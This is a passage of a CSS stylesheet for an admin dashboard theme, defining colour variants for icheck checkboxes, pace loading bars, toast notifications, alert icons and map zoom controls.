.icheck-dark > input:first-child:not(:checked):not(:disabled):hover + label::before,
.icheck-dark > input:first-child:not(:checked):not(:disabled):hover + input[type="hidden"] + label::before {
border-color: #343a40;
}
.icheck-dark > input:first-child:not(:checked):not(:disabled):focus + label::before,
.icheck-dark > input:first-child:not(:checked):not(:disabled):focus + input[type="hidden"] + label::before {
border-color: #343a40;
}
.icheck-dark > input:first-child:checked + label::before,
.icheck-dark > input:first-child:checked + input[type="hidden"] + label::before {
background-color: #343a40;
border-color: #343a40;
}
.icheck-lightblue > input:first-child:not(:checked):not(:disabled):hover + label::before,
.icheck-lightblue > input:first-child:not(:checked):not(:disabled):hover + input[type="hidden"] + label::before {
border-color: #3c8dbc;
}
.icheck-lightblue > input:first-child:not(:checked):not(:disabled):focus + label::before,
.icheck-lightblue > input:first-child:not(:checked):not(:disabled):focus + input[type="hidden"] + label::before {
border-color: #3c8dbc;
}
.icheck-lightblue > input:first-child:checked + label::before,
.icheck-lightblue > input:first-child:checked + input[type="hidden"] + label::before {
background-color: #3c8dbc;
border-color: #3c8dbc;
}
.icheck-navy > input:first-child:not(:checked):not(:disabled):hover + label::before,
.icheck-navy > input:first-child:not(:checked):not(:disabled):hover + input[type="hidden"] + label::before {
border-color: #001f3f;
}
.icheck-navy > input:first-child:not(:checked):not(:disabled):focus + label::before,
.icheck-navy > input:first-child:not(:checked):not(:disabled):focus + input[type="hidden"] + label::before {
border-color: #001f3f;
}
.icheck-navy > input:first-child:checked + label::before,
.icheck-navy > input:first-child:checked + input[type="hidden"] + label::before {
background-color: #001f3f;
border-color: #001f3f;
}
.icheck-olive > input:first-child:not(:checked):not(:disabled):hover + label::before,
.icheck-olive > input:first-child:not(:checked):not(:disabled):hover + input[type="hidden"] + label::before {
border-color: #3d9970;
}
.icheck-olive > input:first-child:not(:checked):not(:disabled):focus + label::before,
.icheck-olive > input:first-child:not(:checked):not(:disabled):focus + input[type="hidden"] + label::before {
border-color: #3d9970;
}
.icheck-olive > input:first-child:checked + label::before,
.icheck-olive > input:first-child:checked + input[type="hidden"] + label::before {
background-color: #3d9970;
border-color: #3d9970;
}
.icheck-lime > input:first-child:not(:checked):not(:disabled):hover + label::before,
.icheck-lime > input:first-child:not(:checked):not(:disabled):hover + input[type="hidden"] + label::before {
border-color: #01ff70;
}
.icheck-lime > input:first-child:not(:checked):not(:disabled):focus + label::before,
.icheck-lime > input:first-child:not(:checked):not(:disabled):focus + input[type="hidden"] + label::before {
border-color: #01ff70;
}
.icheck-lime > input:first-child:checked + label::before,
.icheck-lime > input:first-child:checked + input[type="hidden"] + label::before {
background-color: #01ff70;
border-color: #01ff70;
}
.icheck-fuchsia > input:first-child:not(:checked):not(:disabled):hover + label::before,
.icheck-fuchsia > input:first-child:not(:checked):not(:disabled):hover + input[type="hidden"] + label::before {
border-color: #f012be;
}
.icheck-fuchsia > input:first-child:not(:checked):not(:disabled):focus + label::before,
.icheck-fuchsia > input:first-child:not(:checked):not(:disabled):focus + input[type="hidden"] + label::before {
border-color: #f012be;
}
.icheck-fuchsia > input:first-child:checked + label::before,
.icheck-fuchsia > input:first-child:checked + input[type="hidden"] + label::before {
background-color: #f012be;
border-color: #f012be;
}
.icheck-maroon > input:first-child:not(:checked):not(:disabled):hover + label::before,
.icheck-maroon > input:first-child:not(:checked):not(:disabled):hover + input[type="hidden"] + label::before {
border-color: #d81b60;
}
.icheck-maroon > input:first-child:not(:checked):not(:disabled):focus + label::before,
.icheck-maroon > input:first-child:not(:checked):not(:disabled):focus + input[type="hidden"] + label::before {
border-color: #d81b60;
}
.icheck-maroon > input:first-child:checked + label::before,
.icheck-maroon > input:first-child:checked + input[type="hidden"] + label::before {
background-color: #d81b60;
border-color: #d81b60;
}
.icheck-blue > input:first-child:not(:checked):not(:disabled):hover + label::before,
.icheck-blue > input:first-child:not(:checked):not(:disabled):hover + input[type="hidden"] + label::before {
border-color: #007bff;
}
.icheck-blue > input:first-child:not(:checked):not(:disabled):focus + label::before,
.icheck-blue > input:first-child:not(:checked):not(:disabled):focus + input[type="hidden"] + label::before {
border-color: #007bff;
}
.icheck-blue > input:first-child:checked + label::before,
.icheck-blue > input:first-child:checked + input[type="hidden"] + label::before {
background-color: #007bff;
border-color: #007bff;
}
.icheck-indigo > input:first-child:not(:checked):not(:disabled):hover + label::before,
.icheck-indigo > input:first-child:not(:checked):not(:disabled):hover + input[type="hidden"] + label::before {
border-color: #6610f2;
}
.icheck-indigo > input:first-child:not(:checked):not(:disabled):focus + label::before,
.icheck-indigo > input:first-child:not(:checked):not(:disabled):focus + input[type="hidden"] + label::before {
border-color: #6610f2;
}
.icheck-indigo > input:first-child:checked + label::before,
.icheck-indigo > input:first-child:checked + input[type="hidden"] + label::before {
background-color: #6610f2;
border-color: #6610f2;
}
.icheck-purple > input:first-child:not(:checked):not(:disabled):hover + label::before,
.icheck-purple > input:first-child:not(:checked):not(:disabled):hover + input[type="hidden"] + label::before {
border-color: #6f42c1;
}
.icheck-purple > input:first-child:not(:checked):not(:disabled):focus + label::before,
.icheck-purple > input:first-child:not(:checked):not(:disabled):focus + input[type="hidden"] + label::before {
border-color: #6f42c1;
}
.icheck-purple > input:first-child:checked + label::before,
.icheck-purple > input:first-child:checked + input[type="hidden"] + label::before {
background-color: #6f42c1;
border-color: #6f42c1;
}
.icheck-pink > input:first-child:not(:checked):not(:disabled):hover + label::before,
.icheck-pink > input:first-child:not(:checked):not(:disabled):hover + input[type="hidden"] + label::before {
border-color: #e83e8c;
}
.icheck-pink > input:first-child:not(:checked):not(:disabled):focus + label::before,
.icheck-pink > input:first-child:not(:checked):not(:disabled):focus + input[type="hidden"] + label::before {
border-color: #e83e8c;
}
.icheck-pink > input:first-child:checked + label::before,
.icheck-pink > input:first-child:checked + input[type="hidden"] + label::before {
background-color: #e83e8c;
border-color: #e83e8c;
}
.icheck-red > input:first-child:not(:checked):not(:disabled):hover + label::before,
.icheck-red > input:first-child:not(:checked):not(:disabled):hover + input[type="hidden"] + label::before {
border-color: #dc3545;
}
.icheck-red > input:first-child:not(:checked):not(:disabled):focus + label::before,
.icheck-red > input:first-child:not(:checked):not(:disabled):focus + input[type="hidden"] + label::before {
border-color: #dc3545;
}
.icheck-red > input:first-child:checked + label::before,
.icheck-red > input:first-child:checked + input[type="hidden"] + label::before {
background-color: #dc3545;
border-color: #dc3545;
}
.icheck-orange > input:first-child:not(:checked):not(:disabled):hover + label::before,
.icheck-orange > input:first-child:not(:checked):not(:disabled):hover + input[type="hidden"] + label::before {
border-color: #fd7e14;
}
.icheck-orange > input:first-child:not(:checked):not(:disabled):focus + label::before,
.icheck-orange > input:first-child:not(:checked):not(:disabled):focus + input[type="hidden"] + label::before {
border-color: #fd7e14;
}
.icheck-orange > input:first-child:checked + label::before,
.icheck-orange > input:first-child:checked + input[type="hidden"] + label::before {
background-color: #fd7e14;
border-color: #fd7e14;
}
.icheck-yellow > input:first-child:not(:checked):not(:disabled):hover + label::before,
.icheck-yellow > input:first-child:not(:checked):not(:disabled):hover + input[type="hidden"] + label::before {
border-color: #ffc107;
}
.icheck-yellow > input:first-child:not(:checked):not(:disabled):focus + label::before,
.icheck-yellow > input:first-child:not(:checked):not(:disabled):focus + input[type="hidden"] + label::before {
border-color: #ffc107;
}
.icheck-yellow > input:first-child:checked + label::before,
.icheck-yellow > input:first-child:checked + input[type="hidden"] + label::before {
background-color: #ffc107;
border-color: #ffc107;
}
.icheck-green > input:first-child:not(:checked):not(:disabled):hover + label::before,
.icheck-green > input:first-child:not(:checked):not(:disabled):hover + input[type="hidden"] + label::before {
border-color: #28a745;
}
.icheck-green > input:first-child:not(:checked):not(:disabled):focus + label::before,
.icheck-green > input:first-child:not(:checked):not(:disabled):focus + input[type="hidden"] + label::before {
border-color: #28a745;
}
.icheck-green > input:first-child:checked + label::before,
.icheck-green > input:first-child:checked + input[type="hidden"] + label::before {
background-color: #28a745;
border-color: #28a745;
}
.icheck-teal > input:first-child:not(:checked):not(:disabled):hover + label::before,
.icheck-teal > input:first-child:not(:checked):not(:disabled):hover + input[type="hidden"] + label::before {
border-color: #20c997;
}
.icheck-teal > input:first-child:not(:checked):not(:disabled):focus + label::before,
.icheck-teal > input:first-child:not(:checked):not(:disabled):focus + input[type="hidden"] + label::before {
border-color: #20c997;
}
.icheck-teal > input:first-child:checked + label::before,
.icheck-teal > input:first-child:checked + input[type="hidden"] + label::before {
background-color: #20c997;
border-color: #20c997;
}
.icheck-cyan > input:first-child:not(:checked):not(:disabled):hover + label::before,
.icheck-cyan > input:first-child:not(:checked):not(:disabled):hover + input[type="hidden"] + label::before {
border-color: #17a2b8;
}
.icheck-cyan > input:first-child:not(:checked):not(:disabled):focus + label::before,
.icheck-cyan > input:first-child:not(:checked):not(:disabled):focus + input[type="hidden"] + label::before {
border-color: #17a2b8;
}
.icheck-cyan > input:first-child:checked + label::before,
.icheck-cyan > input:first-child:checked + input[type="hidden"] + label::before {
background-color: #17a2b8;
border-color: #17a2b8;
}
.icheck-white > input:first-child:not(:checked):not(:disabled):hover + label::before,
.icheck-white > input:first-child:not(:checked):not(:disabled):hover + input[type="hidden"] + label::before {
border-color: #ffffff;
}
.icheck-white > input:first-child:not(:checked):not(:disabled):focus + label::before,
.icheck-white > input:first-child:not(:checked):not(:disabled):focus + input[type="hidden"] + label::before {
border-color: #ffffff;
}
.icheck-white > input:first-child:checked + label::before,
.icheck-white > input:first-child:checked + input[type="hidden"] + label::before {
background-color: #ffffff;
border-color: #ffffff;
}
.icheck-gray > input:first-child:not(:checked):not(:disabled):hover + label::before,
.icheck-gray > input:first-child:not(:checked):not(:disabled):hover + input[type="hidden"] + label::before {
border-color: #6c757d;
}
.icheck-gray > input:first-child:not(:checked):not(:disabled):focus + label::before,
.icheck-gray > input:first-child:not(:checked):not(:disabled):focus + input[type="hidden"] + label::before {
border-color: #6c757d;
}
.icheck-gray > input:first-child:checked + label::before,
.icheck-gray > input:first-child:checked + input[type="hidden"] + label::before {
background-color: #6c757d;
border-color: #6c757d;
}
.icheck-gray-dark > input:first-child:not(:checked):not(:disabled):hover + label::before,
.icheck-gray-dark > input:first-child:not(:checked):not(:disabled):hover + input[type="hidden"] + label::before {
border-color: #343a40;
}
.icheck-gray-dark > input:first-child:not(:checked):not(:disabled):focus + label::before,
.icheck-gray-dark > input:first-child:not(:checked):not(:disabled):focus + input[type="hidden"] + label::before {
border-color: #343a40;
}
.icheck-gray-dark > input:first-child:checked + label::before,
.icheck-gray-dark > input:first-child:checked + input[type="hidden"] + label::before {
background-color: #343a40;
border-color: #343a40;
}
.mapael .map {
position: relative;
}
.mapael .mapTooltip {
font-family: "Source Sans Pro", -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol";
font-style: normal;
font-weight: 400;
line-height: 1.5;
text-align: left;
text-align: start;
text-decoration: none;
text-shadow: none;
text-transform: none;
letter-spacing: normal;
word-break: normal;
word-spacing: normal;
white-space: normal;
line-break: auto;
border-radius: 0.25rem;
font-size: 0.875rem;
background-color: #000;
color: #ffffff;
display: block;
max-width: 200px;
padding: 0.25rem 0.5rem;
position: absolute;
text-align: center;
word-wrap: break-word;
z-index: 1070;
}
.mapael .myLegend {
background-color: #f8f9fa;
border: 1px solid #adb5bd;
padding: 10px;
width: 600px;
}
.mapael .zoomButton {
background-color: #f8f9fa;
border: 1px solid #ddd;
border-radius: 0.25rem;
color: #444;
cursor: pointer;
font-weight: bold;
height: 16px;
left: 10px;
line-height: 14px;
padding-left: 1px;
position: absolute;
text-align: center;
top: 0;
-webkit-user-select: none;
-moz-user-select: none;
-ms-user-select: none;
user-select: none;
width: 16px;
}
.mapael .zoomButton:hover, .mapael .zoomButton:active, .mapael .zoomButton.hover {
background-color: #e9ecef;
color: #2b2b2b;
}
.mapael .zoomReset {
line-height: 12px;
top: 10px;
}
.mapael .zoomIn {
top: 30px;
}
.mapael .zoomOut {
top: 50px;
}
.jqvmap-zoomin,
.jqvmap-zoomout {
background-color: #f8f9fa;
border: 1px solid #ddd;
border-radius: 0.25rem;
color: #444;
height: 15px;
width: 15px;
}
.jqvmap-zoomin:hover, .jqvmap-zoomin:active, .jqvmap-zoomin.hover,
.jqvmap-zoomout:hover,
.jqvmap-zoomout:active,
.jqvmap-zoomout.hover {
background-color: #e9ecef;
color: #2b2b2b;
}
.swal2-icon.swal2-info {
border-color: ligthen(#17a2b8, 20%);
color: #17a2b8;
}
.swal2-icon.swal2-warning {
border-color: ligthen(#ffc107, 20%);
color: #ffc107;
}
.swal2-icon.swal2-error {
border-color: ligthen(#dc3545, 20%);
color: #dc3545;
}
.swal2-icon.swal2-question {
border-color: ligthen(#6c757d, 20%);
color: #6c757d;
}
.swal2-icon.swal2-success {
border-color: ligthen(#28a745, 20%);
color: #28a745;
}
.swal2-icon.swal2-success .swal2-success-ring {
border-color: ligthen(#28a745, 20%);
}
.swal2-icon.swal2-success [class^='swal2-success-line'] {
background-color: #28a745;
}
#toast-container .toast {
background-color: #007bff;
}
#toast-container .toast-success {
background-color: #28a745;
}
#toast-container .toast-error {
background-color: #dc3545;
}
#toast-container .toast-info {
background-color: #17a2b8;
}
#toast-container .toast-warning {
background-color: #ffc107;
}
.pace {
z-index: 1048;
}
.pace .pace-progress {
z-index: 1049;
}
.pace .pace-activity {
z-index: 1050;
}
.pace-primary .pace .pace-progress {
background: #007bff;
}
.pace-barber-shop-primary .pace {
background: #ffffff;
}
.pace-barber-shop-primary .pace .pace-progress {
background: #007bff;
}
.pace-barber-shop-primary .pace .pace-activity {
background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.2) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.2) 50%, rgba(255, 255, 255, 0.2) 75%, transparent 75%, transparent);
}
.pace-big-counter-primary .pace .pace-progress::after {
color: rgba(0, 123, 255, 0.2);
}
.pace-bounce-primary .pace .pace-activity {
background: #007bff;
}
.pace-center-atom-primary .pace-progress {
height: 100px;
width: 80px;
}
.pace-center-atom-primary .pace-progress::before {
background: #007bff;
color: #ffffff;
font-size: .8rem;
line-height: .7rem;
padding-top: 17%;
}
.pace-center-atom-primary .pace-activity {
border-color: #007bff;
}
.pace-center-atom-primary .pace-activity::after, .pace-center-atom-primary .pace-activity::before {
border-color: #007bff;
}
.pace-center-circle-primary .pace .pace-progress {
background: rgba(0, 123, 255, 0.8);
color: #ffffff;
}
.pace-center-radar-primary .pace .pace-activity {
border-color: #007bff transparent transparent;
}
.pace-center-radar-primary .pace .pace-activity::before {
border-color: #007bff transparent transparent;
}
.pace-center-simple-primary .pace {
background: #ffffff;
border-color: #007bff;
}
.pace-center-simple-primary .pace .pace-progress {
background: #007bff;
}
.pace-material-primary .pace {
color: #007bff;
}
.pace-corner-indicator-primary .pace .pace-activity {
background: #007bff;
}
.pace-corner-indicator-primary .pace .pace-activity::after,
.pace-corner-indicator-primary .pace .pace-activity::before {
border: 5px solid #ffffff;
}
.pace-corner-indicator-primary .pace .pace-activity::before {
border-right-color: rgba(0, 123, 255, 0.2);
border-left-color: rgba(0, 123, 255, 0.2);
}
.pace-corner-indicator-primary .pace .pace-activity::after {
border-top-color: rgba(0, 123, 255, 0.2);
border-bottom-color: rgba(0, 123, 255, 0.2);
}
.pace-fill-left-primary .pace .pace-progress {
background-color: rgba(0, 123, 255, 0.2);
}
.pace-flash-primary .pace .pace-progress {
background: #007bff;
}
.pace-flash-primary .pace .pace-progress-inner {
box-shadow: 0 0 10px #007bff, 0 0 5px #007bff;
}
.pace-flash-primary .pace .pace-activity {
border-top-color: #007bff;
border-left-color: #007bff;
}
.pace-loading-bar-primary .pace .pace-progress {
background: #007bff;
color: #007bff;
box-shadow: 120px 0 #ffffff, 240px 0 #ffffff;
}
.pace-loading-bar-primary .pace .pace-activity {
box-shadow: inset 0 0 0 2px #007bff, inset 0 0 0 7px #ffffff;
}
.pace-mac-osx-primary .pace .pace-progress {
background-color: #007bff;
box-shadow: inset -1px 0 #007bff, inset 0 -1px #007bff, inset 0 2px rgba(255, 255, 255, 0.5), inset 0 6px rgba(255, 255, 255, 0.3);
}
.pace-mac-osx-primary .pace .pace-activity {
background-image: radial-gradient(rgba(255, 255, 255, 0.65) 0%, rgba(255, 255, 255, 0.15) 100%);
height: 12px;
}
.pace-progress-color-primary .pace-progress {
color: #007bff;
}
.pace-secondary .pace .pace-progress {
background: #6c757d;
}
.pace-barber-shop-secondary .pace {
background: #ffffff;
}
.pace-barber-shop-secondary .pace .pace-progress {
background: #6c757d;
}
.pace-barber-shop-secondary .pace .pace-activity {
background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.2) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.2) 50%, rgba(255, 255, 255, 0.2) 75%, transparent 75%, transparent);
}
.pace-big-counter-secondary .pace .pace-progress::after {
color: rgba(108, 117, 125, 0.2);
}
.pace-bounce-secondary .pace .pace-activity {
background: #6c757d;
}
.pace-center-atom-secondary .pace-progress {
height: 100px;
width: 80px;
}
.pace-center-atom-secondary .pace-progress::before {
background: #6c757d;
color: #ffffff;
font-size: .8rem;
line-height: .7rem;
padding-top: 17%;
}
.pace-center-atom-secondary .pace-activity {
border-color: #6c757d;
}
.pace-center-atom-secondary .pace-activity::after, .pace-center-atom-secondary .pace-activity::before {
border-color: #6c757d;
}
.pace-center-circle-secondary .pace .pace-progress {
background: rgba(108, 117, 125, 0.8);
color: #ffffff;
}
.pace-center-radar-secondary .pace .pace-activity {
border-color: #6c757d transparent transparent;
}
.pace-center-radar-secondary .pace .pace-activity::before {
border-color: #6c757d transparent transparent;
}
.pace-center-simple-secondary .pace {
background: #ffffff;
border-color: #6c757d;
}
.pace-center-simple-secondary .pace .pace-progress {
background: #6c757d;
}
.pace-material-secondary .pace {
color: #6c757d;
}
.pace-corner-indicator-secondary .pace .pace-activity {
background: #6c757d;
}
.pace-corner-indicator-secondary .pace .pace-activity::after,
.pace-corner-indicator-secondary .pace .pace-activity::before {
border: 5px solid #ffffff;
}
.pace-corner-indicator-secondary .pace .pace-activity::before {
border-right-color: rgba(108, 117, 125, 0.2);
border-left-color: rgba(108, 117, 125, 0.2);
}
.pace-corner-indicator-secondary .pace .pace-activity::after {
border-top-color: rgba(108, 117, 125, 0.2);
border-bottom-color: rgba(108, 117, 125, 0.2);
}
.pace-fill-left-secondary .pace .pace-progress {
background-color: rgba(108, 117, 125, 0.2);
}
.pace-flash-secondary .pace .pace-progress {
background: #6c757d;
}
.pace-flash-secondary .pace .pace-progress-inner {
box-shadow: 0 0 10px #6c757d, 0 0 5px #6c757d;
}
.pace-flash-secondary .pace .pace-activity {
border-top-color: #6c757d;
border-left-color: #6c757d;
}
.pace-loading-bar-secondary .pace .pace-progress {
background: #6c757d;
color: #6c757d;
box-shadow: 120px 0 #ffffff, 240px 0 #ffffff;
}
.pace-loading-bar-secondary .pace .pace-activity {
box-shadow: inset 0 0 0 2px #6c757d, inset 0 0 0 7px #ffffff;
}
.pace-mac-osx-secondary .pace .pace-progress {
background-color: #6c757d;
box-shadow: inset -1px 0 #6c757d, inset 0 -1px #6c757d, inset 0 2px rgba(255, 255, 255, 0.5), inset 0 6px rgba(255, 255, 255, 0.3);
}
.pace-mac-osx-secondary .pace .pace-activity {
background-image: radial-gradient(rgba(255, 255, 255, 0.65) 0%, rgba(255, 255, 255, 0.15) 100%);
height: 12px;
}
.pace-progress-color-secondary .pace-progress {
color: #6c757d;
}
.pace-success .pace .pace-progress {
background: #28a745;
}
.pace-barber-shop-success .pace {
background: #ffffff;
}
.pace-barber-shop-success .pace .pace-progress {
background: #28a745;
}
.pace-barber-shop-success .pace .pace-activity {
background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.2) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.2) 50%, rgba(255, 255, 255, 0.2) 75%, transparent 75%, transparent);
}
.pace-big-counter-success .pace .pace-progress::after {
color: rgba(40, 167, 69, 0.2);
}
.pace-bounce-success .pace .pace-activity {
background: #28a745;
}
.pace-center-atom-success .pace-progress {
height: 100px;
width: 80px;
}
.pace-center-atom-success .pace-progress::before {
background: #28a745;
color: #ffffff;
font-size: .8rem;
line-height: .7rem;
padding-top: 17%;
}
.pace-center-atom-success .pace-activity {
border-color: #28a745;
}
.pace-center-atom-success .pace-activity::after, .pace-center-atom-success .pace-activity::before {
border-color: #28a745;
}
.pace-center-circle-success .pace .pace-progress {
background: rgba(40, 167, 69, 0.8);
color: #ffffff;
}
.pace-center-radar-success .pace .pace-activity {
border-color: #28a745 transparent transparent;
}
.pace-center-radar-success .pace .pace-activity::before {
border-color: #28a745 transparent transparent;
}
.pace-center-simple-success .pace {
background: #ffffff;
border-color: #28a745;
}
.pace-center-simple-success .pace .pace-progress {
background: #28a745;
}
.pace-material-success .pace {
color: #28a745;
}
.pace-corner-indicator-success .pace .pace-activity {
background: #28a745;
}
.pace-corner-indicator-success .pace .pace-activity::after,
.pace-corner-indicator-success .pace .pace-activity::before {
border: 5px solid #ffffff;
}
.pace-corner-indicator-success .pace .pace-activity::before {
border-right-color: rgba(40, 167, 69, 0.2);
border-left-color: rgba(40, 167, 69, 0.2);
}
.pace-corner-indicator-success .pace .pace-activity::after {
border-top-color: rgba(40, 167, 69, 0.2);
border-bottom-color: rgba(40, 167, 69, 0.2);
}
.pace-fill-left-success .pace .pace-progress {
background-color: rgba(40, 167, 69, 0.2);
}
.pace-flash-success .pace .pace-progress {
background: #28a745;
}
.pace-flash-success .pace .pace-progress-inner {
box-shadow: 0 0 10px #28a745, 0 0 5px #28a745;
}
.pace-flash-success .pace .pace-activity {
border-top-color: #28a745;
border-left-color: #28a745;
}
.pace-loading-bar-success .pace .pace-progress {
background: #28a745;
color: #28a745;
box-shadow: 120px 0 #ffffff, 240px 0 #ffffff;
}
.pace-loading-bar-success .pace .pace-activity {
box-shadow: inset 0 0 0 2px #28a745, inset 0 0 0 7px #ffffff;
}
.pace-mac-osx-success .pace .pace-progress {
background-color: #28a745;
box-shadow: inset -1px 0 #28a745, inset 0 -1px #28a745, inset 0 2px rgba(255, 255, 255, 0.5), inset 0 6px rgba(255, 255, 255, 0.3);
}
.pace-mac-osx-success .pace .pace-activity {
background-image: radial-gradient(rgba(255, 255, 255, 0.65) 0%, rgba(255, 255, 255, 0.15) 100%);
height: 12px;
}
.pace-progress-color-success .pace-progress {
color: #28a745;
}
.pace-info .pace .pace-progress {
background: #17a2b8;
}
.pace-barber-shop-info .pace {
background: #ffffff;
}
.pace-barber-shop-info .pace .pace-progress {
background: #17a2b8;
}
.pace-barber-shop-info .pace .pace-activity {
background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.2) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.2) 50%, rgba(255, 255, 255, 0.2) 75%, transparent 75%, transparent);
}
.pace-big-counter-info .pace .pace-progress::after {
color: rgba(23, 162, 184, 0.2);
}
.pace-bounce-info .pace .pace-activity {
background: #17a2b8;
}
.pace-center-atom-info .pace-progress {
height: 100px;
width: 80px;
}
.pace-center-atom-info .pace-progress::before {
background: #17a2b8;
color: #ffffff;
font-size: .8rem;
line-height: .7rem;
padding-top: 17%;
}
.pace-center-atom-info .pace-activity {
border-color: #17a2b8;
}
.pace-center-atom-info .pace-activity::after, .pace-center-atom-info .pace-activity::before {
border-color: #17a2b8;
}
.pace-center-circle-info .pace .pace-progress {
background: rgba(23, 162, 184, 0.8);
color: #ffffff;
}
.pace-center-radar-info .pace .pace-activity {
border-color: #17a2b8 transparent transparent;
}
.pace-center-radar-info .pace .pace-activity::before {
border-color: #17a2b8 transparent transparent;
}
.pace-center-simple-info .pace {
background: #ffffff;
border-color: #17a2b8;
}
.pace-center-simple-info .pace .pace-progress {
background: #17a2b8;
}
.pace-material-info .pace {
color: #17a2b8;
}
.pace-corner-indicator-info .pace .pace-activity {
background: #17a2b8;
}
.pace-corner-indicator-info .pace .pace-activity::after,
.pace-corner-indicator-info .pace .pace-activity::before {
border: 5px solid #ffffff;
}
.pace-corner-indicator-info .pace .pace-activity::before {
border-right-color: rgba(23, 162, 184, 0.2);
border-left-color: rgba(23, 162, 184, 0.2);
}
.pace-corner-indicator-info .pace .pace-activity::after {
border-top-color: rgba(23, 162, 184, 0.2);
border-bottom-color: rgba(23, 162, 184, 0.2);
}
.pace-fill-left-info .pace .pace-progress {
background-color: rgba(23, 162, 184, 0.2);
}
.pace-flash-info .pace .pace-progress {
background: #17a2b8;
}
.pace-flash-info .pace .pace-progress-inner {
box-shadow: 0 0 10px #17a2b8, 0 0 5px #17a2b8;
}
.pace-flash-info .pace .pace-activity {
border-top-color: #17a2b8;
border-left-color: #17a2b8;
}
.pace-loading-bar-info .pace .pace-progress {
background: #17a2b8;
color: #17a2b8;
box-shadow: 120px 0 #ffffff, 240px 0 #ffffff;
}
.pace-loading-bar-info .pace .pace-activity {
box-shadow: inset 0 0 0 2px #17a2b8, inset 0 0 0 7px #ffffff;
}
.pace-mac-osx-info .pace .pace-progress {
background-color: #17a2b8;
box-shadow: inset -1px 0 #17a2b8, inset 0 -1px #17a2b8, inset 0 2px rgba(255, 255, 255, 0.5), inset 0 6px rgba(255, 255, 255, 0.3);
}
.pace-mac-osx-info .pace .pace-activity {
background-image: radial-gradient(rgba(255, 255, 255, 0.65) 0%, rgba(255, 255, 255, 0.15) 100%);
height: 12px;
}
.pace-progress-color-info .pace-progress {
color: #17a2b8;
}
.pace-warning .pace .pace-progress {
background: #ffc107;
}
.pace-barber-shop-warning .pace {
background: #1F2D3D;
}
.pace-barber-shop-warning .pace .pace-progress {
background: #ffc107;
}
.pace-barber-shop-warning .pace .pace-activity {
background-image: linear-gradient(45deg, rgba(31, 45, 61, 0.2) 25%, transparent 25%, transparent 50%, rgba(31, 45, 61, 0.2) 50%, rgba(31, 45, 61, 0.2) 75%, transparent 75%, transparent);
}
.pace-big-counter-warning .pace .pace-progress::after {
color: rgba(255, 193, 7, 0.2);
}
.pace-bounce-warning .pace .pace-activity {
background: #ffc107;
}
.pace-center-atom-warning .pace-progress {
height: 100px;
width: 80px;
}
.pace-center-atom-warning .pace-progress::before {
background: #ffc107;
color: #1F2D3D;
font-size: .8rem;
line-height: .7rem;
padding-top: 17%;
}
.pace-center-atom-warning .pace-activity {
border-color: #ffc107;
}
.pace-center-atom-warning .pace-activity::after, .pace-center-atom-warning .pace-activity::before {
border-color: #ffc107;
}
.pace-center-circle-warning .pace .pace-progress {
background: rgba(255, 193, 7, 0.8);
color: #1F2D3D;
}
.pace-center-radar-warning .pace .pace-activity {
border-color: #ffc107 transparent transparent;
}
.pace-center-radar-warning .pace .pace-activity::before {
border-color: #ffc107 transparent transparent;
}
.pace-center-simple-warning .pace {
background: #1F2D3D;
border-color: #ffc107;
}
.pace-center-simple-warning .pace .pace-progress {
background: #ffc107;
}
.pace-material-warning .pace {
color: #ffc107;
}
.pace-corner-indicator-warning .pace .pace-activity {
background: #ffc107;
}
.pace-corner-indicator-warning .pace .pace-activity::after,
.pace-corner-indicator-warning .pace .pace-activity::before {
border: 5px solid #1F2D3D;
}
.pace-corner-indicator-warning .pace .pace-activity::before {
border-right-color: rgba(255, 193, 7, 0.2);
border-left-color: rgba(255, 193, 7, 0.2);
}
.pace-corner-indicator-warning .pace .pace-activity::after {
border-top-color: rgba(255, 193, 7, 0.2);
border-bottom-color: rgba(255, 193, 7, 0.2);
}
.pace-fill-left-warning .pace .pace-progress {
background-color: rgba(255, 193, 7, 0.2);
}
.pace-flash-warning .pace .pace-progress {
background: #ffc107;
}
.pace-flash-warning .pace .pace-progress-inner {
box-shadow: 0 0 10px #ffc107, 0 0 5px #ffc107;
}
.pace-flash-warning .pace .pace-activity {
border-top-color: #ffc107;
border-left-color: #ffc107;
}
.pace-loading-bar-warning .pace .pace-progress {
background: #ffc107;
color: #ffc107;
box-shadow: 120px 0 #1F2D3D, 240px 0 #1F2D3D;
}
.pace-loading-bar-warning .pace .pace-activity {
box-shadow: inset 0 0 0 2px #ffc107, inset 0 0 0 7px #1F2D3D;
}
.pace-mac-osx-warning .pace .pace-progress {
background-color: #ffc107;
box-shadow: inset -1px 0 #ffc107, inset 0 -1px #ffc107, inset 0 2px rgba(31, 45, 61, 0.5), inset 0 6px rgba(31, 45, 61, 0.3);
}
.pace-mac-osx-warning .pace .pace-activity {
background-image: radial-gradient(rgba(31, 45, 61, 0.65) 0%, rgba(31, 45, 61, 0.15) 100%);
height: 12px;
}
.pace-progress-color-warning .pace-progress {
color: #ffc107;
}
.pace-danger .pace .pace-progress {
background: #dc3545;
}
.pace-barber-shop-danger .pace {
background: #ffffff;
}
.pace-barber-shop-danger .pace .pace-progress {
background: #dc3545;
}
.pace-barber-shop-danger .pace .pace-activity {
background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.2) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.2) 50%, rgba(255, 255, 255, 0.2) 75%, transparent 75%, transparent);
}
.pace-big-counter-danger .pace .pace-progress::after {
color: rgba(220, 53, 69, 0.2);
}
.pace-bounce-danger .pace .pace-activity {
background: #dc3545;
}
.pace-center-atom-danger .pace-progress {
height: 100px;
width: 80px;
}
.pace-center-atom-danger .pace-progress::before {
background: #dc3545;
color: #ffffff;
font-size: .8rem;
line-height: .7rem;
padding-top: 17%;
}
.pace-center-atom-danger .pace-activity {
border-color: #dc3545;
}
.pace-center-atom-danger .pace-activity::after, .pace-center-atom-danger .pace-activity::before {
border-color: #dc3545;
}
.pace-center-circle-danger .pace .pace-progress {
background: rgba(220, 53, 69, 0.8);
color: #ffffff;
}
.pace-center-radar-danger .pace .pace-activity {
border-color: #dc3545 transparent transparent;
}
